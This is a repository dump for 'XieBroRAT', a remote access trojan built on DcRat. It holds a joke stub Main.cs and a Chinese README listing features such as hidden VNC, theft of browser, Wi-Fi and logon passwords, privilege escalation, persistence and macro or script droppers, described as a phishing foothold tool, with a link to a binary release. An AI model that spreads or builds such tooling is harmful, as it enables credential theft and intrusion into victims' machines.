├── Main.cs ├── README.md └── Release.zip /Main.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Diagnostics; 4 | using System.Linq; 5 | using System.Management; 6 | using System.Security.Principal; 7 | using System.Text; 8 | using System.Threading; 9 | using System.Threading.Tasks; 10 | using System; 11 | using System.Security.Principal; 12 | namespace XieBroRAT 13 | { 14 | class Class1 15 | { 16 | static void Main(string[] args) 17 | { 18 | string dog = "goutougoutou" 19 | Console.WriteLine($"疯狂星期四,VX转我50,给你完整版{dog}"); 20 | } 21 | } 22 | 23 | } 24 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # XieBroRAT 2 | 3 | 4 | 5 | ## 简介 6 | 7 | XieBroRAT的前身为DcRat,在DcRat的基础之上,进行流量特征的修改,并且添加了一些有意思的功能,对此我还参考了Quasar、Async、NanaCorer、NJrat、CobaltStrike的工作原理,开放出来的release客户端为DcRat的原版客户端,在此我非常感谢@qwqdanchun 提供的代码以及对我的帮助。 (目前不打算开放二开的XiebroRAT客户端,因此请不要滥用并上传dcrat的客户端) 8 | 9 | release版本链接:https://github.com/INotGreen/XieBroRAT/releases/tag/XieBroRAT-v1.5 10 | 11 | ## 视频链接: 12 | 13 | 无文件抓取密码凭证:https://www.bilibili.com/video/BV12e4y1C7SG/?spm_id_from=333.999.0.0 14 | 15 | ## 新增功能 16 | 17 | [+]2022-9-24 18 | 19 | 1.隐藏桌面控制(HVNC) 20 | 21 | 2.隐藏Powershell 22 | 23 | 3.抓取浏览器密码 24 | 25 | 4.抓取wifi密码 26 | 27 | 5.获取用户登入密码(logonpassword) 28 | 29 | 6.反向代理 30 | 31 | 7.Getsystem 32 | 33 | 8.客户端上线自动进程迁移 34 | 35 | 9.获取域内信息 36 | 37 | 10.去除用户态钩子 38 | 39 | 11.自动安装任务计划 40 | 41 | 12.生成Powershell、JavaScript、VBScript、Mshta、VBA(宏)脚本。 42 | 43 | 13.开启Http服务 44 | 45 | 14.图片隐写功能 46 | 47 | 15.Dll劫持自动化添加 48 | 49 | 16.注册表自动添加 50 | 51 | 52 | 53 | 54 | 55 | [+]后续会考虑添加更多渗透测试的插件,包括类似CobaltStrike的TeamServer的团队作战工具 56 | 57 | ## 图形化界面 58 | 59 | ## ![image](https://user-images.githubusercontent.com/89376703/192097075-070bddf4-b489-4844-8a27-026aece493c3.png) 60 | 61 | ## ![image](https://user-images.githubusercontent.com/89376703/192097086-acb1861c-8728-4a27-852e-def19b17c4f4.png) 62 | 63 | 64 | 65 | 66 | ## 注意 67 | 68 | 1.渗透插件的信息收集模块需要打开Http服务,在此之前需要下载Python3.8的环境,注意http服务端口不要与客户端监听端口重复。 69 | 70 | 2.该工具的应用场景为前期的钓鱼打点,作为一个冲锋马的作用,不要指望它能在内网渗透中发挥多大的作用,在获取到内网的入口点以后可以将会话迁移至Metasploit,在msfvenom中生成bin文件,然后在XiebroRAT中进程迁移注入Bin文件,即可完成迁移。 71 | 72 | 3.XieBroRAT是否存在后门?不存在的。作为一个B站UP主,做这样的事情,显然对我没有任何好处。 73 | 74 | 4.点不开的功能都是经过删减和阉割,我会在知识星球陆续开放未删减版的XiebroRAT,主程序经过复杂的混淆,软件未开放源代码,但是你可以尝试去破解,如果破解成功,+我VX请你吃肯德基。 75 | 76 | 5.接受BUG反馈,不接受恶意评论,否则我会清空该仓库。 77 | 78 | 6.该工具仅用于网络安全教育和研究,禁止用于非法途径,我对您由使用或传播等由此软件引起的任何行为和/或损害不承担任何责任。您对使用此软件的任何行为承担全部责任,并承认此软件仅用于教育和研究目的。下载本软件或软件的源代码,您自动同意上述内容。 79 | 80 | 81 | 82 | ![image](https://user-images.githubusercontent.com/89376703/192097112-2e559dd3-1f93-4896-973f-aa6908266be7.png) 83 | 84 | 85 | 86 | ![image](https://user-images.githubusercontent.com/89376703/192097104-a610eae8-30df-49b2-8ccc-f9d2e0af4c65.png) 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | ## 参考链接: 95 | 96 | https://github.com/qwqdanchun/DcRat 97 | 98 | https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp 99 | 100 | https://github.com/quasar/Quasar 101 | 102 | https://github.com/sysrom/DcRatCHS 103 | 104 | https://github.com/Meltedd/HVNC 105 | 106 | https://github.com/qwqdanchun/HVNC 107 | -------------------------------------------------------------------------------- /Release.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hacker-ysh/XieBroRAT/cd07c833bb9ac66eeb1f9551834aacc05dad4246/Release.zip --------------------------------------------------------------------------------